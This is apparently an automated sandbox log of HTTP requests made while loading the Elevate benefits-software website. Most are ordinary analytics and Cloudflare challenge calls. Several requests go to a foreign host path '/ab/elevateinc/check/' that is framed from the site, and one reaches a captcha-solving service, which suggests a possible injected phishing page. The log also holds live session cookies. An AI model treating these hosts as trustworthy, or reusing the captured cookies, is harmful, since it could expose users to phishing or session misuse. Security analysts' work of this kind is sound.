Source: global traffic	HTTP traffic detected: GET /collectedforms.js HTTP/1.1host: js.hscollectedforms.netorigin: https://www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/09yg8/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/ HTTP/1.1host: challenges.cloudflare.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /analytics/1749250500000/19524073.js HTTP/1.1host: js.hs-analytics.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/09yg8/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /collected-forms/v1/config/json?portalId=19524073&utk= HTTP/1.1host: forms.hscollectedforms.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: application/json, text/plain, /sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0origin: https://www.elevate.incsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=94bb7f6409043594&lang=auto HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/09yg8/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /hs-script-loader-public/v1/config/pixels-and-events/json?portalId=19524073 HTTP/1.1host: api.hubapi.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://www.elevate.incsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/hk1y9/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/ HTTP/1.1host: challenges.cloudflare.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /js/mida-event.js?v=1.1.50 HTTP/1.1host: cdn.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/hk1y9/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /js/mida-integration.js?v=1.1.50 HTTP/1.1host: cdn.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=94bb7f676d193594&lang=auto HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/hk1y9/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /widget/event/w6GQ23b4dMgP1RzEeKpkDq HTTP/1.1host: api.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"content-type: application/json;charset=UTF-8sec-ch-ua-mobile: ?0accept: /origin: https://www.elevate.incsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /li.lms-analytics/insight.min.js HTTP/1.1host: snap.licdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/mida-goal.js?v=1.1.50 HTTP/1.1host: cdn.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /init/uuid HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /abtest/visitor HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /widget/event/w6GQ23b4dMgP1RzEeKpkDq HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ab/elevateinc/check/index.html HTTP/1.1Host: reefe.com.auConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://www.elevate.inc/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/g/91b8d9bf2593/api.js HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /collected-forms/v1/config/json?portalId=19524073&utk= HTTP/1.1host: forms.hscollectedforms.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /tag/qcbwstkzrz?ref=gtm2 HTTP/1.1host: www.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /integration/enabled/w6GQ23b4dMgP1RzEeKpkDq HTTP/1.1host: api.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"content-type: application/json;charset=UTF-8sec-ch-ua-mobile: ?0accept: /origin: https://www.elevate.incsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /hs-script-loader-public/v1/config/pixels-and-events/json?portalId=19524073 HTTP/1.1host: api.hubapi.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/lepop/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/ HTTP/1.1host: challenges.cloudflare.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /td/rul/11308007612?random=1749250529827&cv=11&fst=1749250529827&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg HTTP/1.1host: td.doubleclick.netsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest:
Source: global traffic	HTTP traffic detected: GET /embed/v3/counters.gif?key=collected-forms-embed-js-form-bind&count=1 HTTP/1.1Host: forms.hsforms.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.elevate.inc/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /td/rul/11308007612?random=1749250529836&cv=11&fst=1749250529836&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config HTTP/1.1host: td.doubleclick.netsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-de
Source: global traffic	HTTP traffic detected: GET /integration/enabled/w6GQ23b4dMgP1RzEeKpkDq HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=94bb7f6b5a0e3594&lang=auto HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/lepop/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/lepop/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/578173051:1749248989:ofWsHxH2SCaqDwfYHjmWDSvWa5y_r8jGMjs_Jcmo-Ac/94bb7f676d193594/YMK7TNejmOfEtlX4Jaipa3LIa4VdQmeVzzmn5zJIJmk-1749250530-1.2.1.1-VlKBfFfT5WmzHyBGdJnzZCmt19OkBZQ5OA_dEq_hOU7RPvii9SGhWd8zbCt6y7Oh HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /test/goal HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ab/elevateinc/check/images/all.min.css HTTP/1.1Host: reefe.com.auConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://reefe.com.au/ab/elevateinc/check/index.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /attribution_trigger?pid=3682316&time=1749250530194&url=https%3A%2F%2Fwww.elevate.inc%2F&tm=gtmv2 HTTP/1.1host: px.ads.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: *sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0origin: https://www.elevate.incattribution-reporting-eligible: trigger=navigation-source;event-sourceattribution-reporting-support: web=ossec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /embed/v3/counters.gif?key=collected-forms-embed-js-form-bind&count=1 HTTP/1.1Host: forms.hsforms.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=lgD7OnYtDjd6VlOs1QRygVd2wsFHvhy9ojpZsxv7QGc-1749250531-1.0.1.1-WBNCxbYHgsxZCj3wcRv91i3ijvYdkBErKDSacaX_qOp7xPIom4T8P8dspw22PVijG3v1z9Y1lb.j.pICAo4XKPADuVQWyLcJjty.4ec6.LA; _cfuvid=LOZ1ricCiAmusuCcvAhjWZDp4AwD8pwM.xDSDSWDHto-1749250531318-0.0.1.1-604800000
Source: global traffic	HTTP traffic detected: GET /dist/web/assets/google-privacy-policy-Cb0CGVRT.svg HTTP/1.1host: 2captcha.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://reefe.com.au/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2, i
